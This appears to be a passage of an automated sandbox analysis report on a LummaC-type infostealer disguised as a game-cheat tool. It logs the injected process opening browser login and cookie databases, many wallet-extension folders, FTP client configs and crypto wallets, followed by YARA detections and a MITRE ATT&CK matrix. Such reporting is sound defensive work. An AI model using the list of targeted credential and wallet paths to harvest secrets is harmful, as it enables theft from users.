Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Directory queried: C:\Users\user\Documents\NWTVCDUMOB

Jump to behavior

Source: Yara match

File source: Process Memory Space: BitLockerToGo.exe PID: 3592, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected MicroClip

Source: Yara match	File source: 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GlobalCheats.exe PID: 6764, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	21 Input Capture	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	21 Input Capture	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	41 Data from Local System	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 System Information Discovery	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GlobalCheats.exe	29%	ReversingLabs	Win64.Trojan.BitGoLoader

Source	Detection	Scanner	Label
